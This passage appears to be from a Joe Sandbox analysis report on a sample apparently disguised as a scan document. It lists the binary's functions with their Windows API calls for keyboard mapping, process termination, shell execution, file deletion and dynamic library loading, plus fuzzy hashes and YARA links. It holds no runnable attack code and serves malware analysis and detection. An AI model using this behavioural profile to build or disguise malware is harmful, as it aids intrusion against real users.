Instruction ID: 8062e9420107747b4ee0e9d07450c381f45b5647a8f7713fa3afd342f8ac26e2
Opcode Fuzzy Hash: fbc241248d2aaa85f51b2a6497c70e47d628fa17918573f3394e813a365c5340
Instruction Fuzzy Hash: 8C014F75A00718BBEB109BA69C49A5EBFB8FB49751F044065FA04E7681DA70DC00CFA0

Function 00811BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00811BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00811BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00811C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00811C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00811C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00811C22

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9793ae4ce71b431f56d3d3ef4fec3d52770578dfa0b0fe19880e06f701a98c7c
Instruction ID: 2337703464a6f9ee212430fa96ea39a66334e7a06e6b9de92bce74c1d70a8111
Opcode Fuzzy Hash: 9793ae4ce71b431f56d3d3ef4fec3d52770578dfa0b0fe19880e06f701a98c7c
Instruction Fuzzy Hash: 4A0167B0902B5ABDE3008F6A8C85B52FFE8FF19354F04411BA15C4BA42C7F5A864CBE5

Function 0087EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0087EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0087EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0087EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0087EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0087EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0087EB75

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 7e759b3454cc717106e17f0b44f214ae25b8739cb0f419d8951b409b43e62612
Instruction ID: 40168818099cb8d42b4809b61048450c53e67157d579d0993def229f72e36206
Opcode Fuzzy Hash: 7e759b3454cc717106e17f0b44f214ae25b8739cb0f419d8951b409b43e62612
Instruction Fuzzy Hash: 1BF01772240558BBE6219B629C0EEAB7A7CFBDBB11F004159F601E1591EBA05A0186B5

Function 00867439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00867452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00867469
GetWindowDC.USER32(?), ref: 00867475
GetPixel.GDI32(00000000,?,?), ref: 00867484
ReleaseDC.USER32(?,00000000), ref: 00867496
GetSysColor.USER32(00000005), ref: 008674B0

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 437e8727d222653393daad84f1a23778484038ea3146e693da763592178d0442
Instruction ID: a7d42d0348540ced15115b729965fc4cb1676fc43b31d000ef18ab4dde283bf8
Opcode Fuzzy Hash: 437e8727d222653393daad84f1a23778484038ea3146e693da763592178d0442
Instruction Fuzzy Hash: B501A931400219EFEB509FA4DD08BAE7BB6FF05325F210064FA26E25A0CF311E41EB90

Function 00871874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0087187F
UnloadUserProfile.USERENV(?,?), ref: 0087188B
CloseHandle.KERNEL32(?), ref: 00871894
CloseHandle.KERNEL32(?), ref: 0087189C
GetProcessHeap.KERNEL32(00000000,?), ref: 008718A5
HeapFree.KERNEL32(00000000), ref: 008718AC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 23863f7181cddd2d4649a1fba116ba666bc512aef1ccacc7ea64a9e59b9ce47b
Instruction ID: 7ffbc852af878ce1165dcd9bd31d78e644538c451e1beffe6e0c94e4b1b5982e
Opcode Fuzzy Hash: 23863f7181cddd2d4649a1fba116ba666bc512aef1ccacc7ea64a9e59b9ce47b
Instruction Fuzzy Hash: DBE0E536204101BBEB015FA5ED0C90AFF79FF4AB22B108220F22581970CB329421DF50

Function 0087C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00817620: _wcslen.LIBCMT ref: 00817625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0087C6EE
_wcslen.LIBCMT ref: 0087C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0087C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0087C7CA

Strings

0, xrefs: 0087C6AF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: f2acfcf23844fd5aec972e94861d7188698bef7afa9191b05b7ac0069efeb9df
Instruction ID: df52c7669c8f35e50a65e9584c483644c6d0f36b49f666fd1b5ce552c23db30c
Opcode Fuzzy Hash: f2acfcf23844fd5aec972e94861d7188698bef7afa9191b05b7ac0069efeb9df
Instruction Fuzzy Hash: CF51DE716083009BD7189F2CC885A6B77E8FF9A394F048A2DF999E31A5DF70D944CB52

Function 0089AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0089AEA3

Part of subcall function 00817620: _wcslen.LIBCMT ref: 00817625

GetProcessId.KERNEL32(00000000), ref: 0089AF38
CloseHandle.KERNEL32(00000000), ref: 0089AF67

Strings

@, xrefs: 0089AE72
<, xrefs: 0089AE6B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: b962e53de740956b7dca941e779080668442b45bb99f705544a9c1b75b5de4b2
Instruction ID: 6f9ac9b25f206e60ff7a7a1de2099239b1ec9536349287a352b8b34d46d2ab24
Opcode Fuzzy Hash: b962e53de740956b7dca941e779080668442b45bb99f705544a9c1b75b5de4b2
Instruction Fuzzy Hash: A8713774A00219DFCF14EF58C484A9EBBB5FF08314F088499E816AB752CB75ED85CB92

Function 0087719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00877206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0087723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0087724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008772CF

Strings

DllGetClassObject, xrefs: 00877242

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 7bfb60997defd8b72c9d193725d9e0be4d906f8995dfc64fd58d260ac79e23cd
Instruction ID: 9706590ac4e62610e0a26b6e601e8dea8fd3b091979dad5de2e81a96f9597e95
Opcode Fuzzy Hash: 7bfb60997defd8b72c9d193725d9e0be4d906f8995dfc64fd58d260ac79e23cd
Instruction Fuzzy Hash: BF416B71A04204EFDB15CF94C884A9A7BA9FF45314F1480A9BD1ADF20ED7B0D944DBA0

Function 008A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008A2F8D
LoadLibraryW.KERNEL32(?), ref: 008A2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008A2FA9
DestroyWindow.USER32(?), ref: 008A2FB1

Strings

SysAnimate32, xrefs: 008A2F68

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 9543f169b7774eecaa10b553932183d36a731e9a8f38fe63d273cc53ccabd882
Instruction ID: c882540c39c35ab9049b35d48d41c067a3c808a0b7730cc251328533ef558ce6
Opcode Fuzzy Hash: 9543f169b7774eecaa10b553932183d36a731e9a8f38fe63d273cc53ccabd882
Instruction Fuzzy Hash: 5E219A71200209AFFB309F68DC80EBB37B9FB5A368F104229FA50D6990DB71DC919760

Function 00834D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00834D1E,008428E9,?,00834CBE,008428E9,008D88B8,0000000C,00834E15,008428E9,00000002), ref: 00834D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00834DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00834D1E,008428E9,?,00834CBE,008428E9,008D88B8,0000000C,00834E15,008428E9,00000002,00000000), ref: 00834DC3

Strings

mscoree.dll, xrefs: 00834D86
CorExitProcess, xrefs: 00834D98

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f77f4c2ffce647d5ad94eaf6419dd4a3cc7556c05df5bb551fbfb036eef90fee
Instruction ID: 8c62049ae16b9ebb502ac6ff77886f4bc86747e8bbb9df099f01eee671bbac78
Opcode Fuzzy Hash: f77f4c2ffce647d5ad94eaf6419dd4a3cc7556c05df5bb551fbfb036eef90fee
Instruction Fuzzy Hash: E0F03C34A41618ABEB119B94DC49BAEBFE5FB44751F0001A4E806E2660CF75AD40DED5

Function 0086D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0086D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0086D3BF
FreeLibrary.KERNEL32(00000000), ref: 0086D3E5

Strings

X64, xrefs: 0086D2A8
GetSystemWow64DirectoryW, xrefs: 0086D3B9

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 82be257e039231f774a07d78f4730894c6e6dcc0400ca8b0e17cc42f7bcbbda2
Instruction ID: a297cb63ff226854e3e6a3e452b5bee0d5f1d73fb74125c5e2883a26af56a864
Opcode Fuzzy Hash: 82be257e039231f774a07d78f4730894c6e6dcc0400ca8b0e17cc42f7bcbbda2
Instruction Fuzzy Hash: 78F05571F05B208BE77117118C28A6E3720FF12709B568155F602EA321EB20CC84C792

Function 00814E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00814EDD,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00814EAE
FreeLibrary.KERNEL32(00000000,?,?,00814EDD,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00814EA8
kernel32.dll, xrefs: 00814E94

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 6f25a49518c044b1e8791cfb561095a280105b1cc8d5af3a04ae76d5e7ba2fee
Instruction ID: b85881fec64011d4c9bc059d0e947e72b2f4df5f0c9d5441b20d4c3893854add
Opcode Fuzzy Hash: 6f25a49518c044b1e8791cfb561095a280105b1cc8d5af3a04ae76d5e7ba2fee
Instruction Fuzzy Hash: 3BE08635B019225BA2311B256C18B9B7658FF82B727050115FC04D2600DB64CD4284A1

Function 00814E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00853CDE,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00814E74
FreeLibrary.KERNEL32(00000000,?,?,00853CDE,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814E87

Strings

kernel32.dll, xrefs: 00814E5B
Wow64RevertWow64FsRedirection, xrefs: 00814E6E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 9585ab067d2a81acf6942d2c3e693e25ca69607aad54d4b13fd926b13867de53
Instruction ID: 3df3d790f6dff00018e60566ed398687ca9ef9fe4181d8eff4372c10332cfbdd
Opcode Fuzzy Hash: 9585ab067d2a81acf6942d2c3e693e25ca69607aad54d4b13fd926b13867de53
Instruction Fuzzy Hash: 5ED01235602A225766221B257C18DCB7A1CFF86B713450615F905E2614DF65CD42C5E0

Function 00882947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00882C05
DeleteFileW.KERNEL32(?), ref: 00882C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00882C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00882CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00882CC0

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 1f5840a8cd93ed26abb51237c77b24e343bc42f297a3d5e79e1e94de92fc5c8e
Instruction ID: d0ec38892414321d62ae7b0a1830bb7ac355c170860e7114373a24bcd1b96136
Opcode Fuzzy Hash: 1f5840a8cd93ed26abb51237c77b24e343bc42f297a3d5e79e1e94de92fc5c8e
Instruction Fuzzy Hash: ECB14F71D01129ABDF15EBA8CC85EEEB7BDFF49350F1040A6F509E6141EA319A448FA1

Function 0089A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0089A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0089A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0089A468
CloseHandle.KERNEL32(?), ref: 0089A63D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: f84652a55adbadc899f799bd3238582dc4cd7bf3f50cf0f402a6c4d8cbea1f41
Instruction ID: 27b453d339398d167e006fa6b31306b76a3c14d5bb1bd42d2f50b98243d691c2
Opcode Fuzzy Hash: f84652a55adbadc899f799bd3238582dc4cd7bf3f50cf0f402a6c4d8cbea1f41
Instruction Fuzzy Hash: 01A16D716043009FDB24EF28D886B2AB7E5FF94714F14885DF55ADB292DBB0EC418B92

Function 0084BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008B3700), ref: 0084BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,008E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0084BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,008E1270,000000FF,?,0000003F,00000000,?), ref: 0084BC36
_free.LIBCMT ref: 0084BB7F

Part of subcall function 008429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000), ref: 008429DE
Part of subcall function 008429C8: GetLastError.KERNEL32(00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000,00000000), ref: 008429F0

_free.LIBCMT ref: 0084BD4B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: a69a9c19405967a550f219219947f9ce714fd0edeef8ff4493c9430bb3bf5c6a
Instruction ID: 92d154c32cb1cd0ae437891b914b4e7aadde01061fc2decdba71ed45376bbabd
Opcode Fuzzy Hash: a69a9c19405967a550f219219947f9ce714fd0edeef8ff4493c9430bb3bf5c6a
Instruction Fuzzy Hash: B451D37190021DEFDB14EF699CC59AEBBB8FF41320B10026AE564D72A1EB30DE41CB91

Function 0087E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0087DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0087CF22,?), ref: 0087DDFD

Part of subcall function 0087DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0087CF22,?), ref: 0087DE16

Part of subcall function 0087E199: GetFileAttributesW.KERNEL32(?,0087CF95), ref: 0087E19A

lstrcmpiW.KERNEL32(?,?), ref: 0087E473
MoveFileW.KERNEL32(?,?), ref: 0087E4AC
_wcslen.LIBCMT ref: 0087E5EB
_wcslen.LIBCMT ref: 0087E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0087E650

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

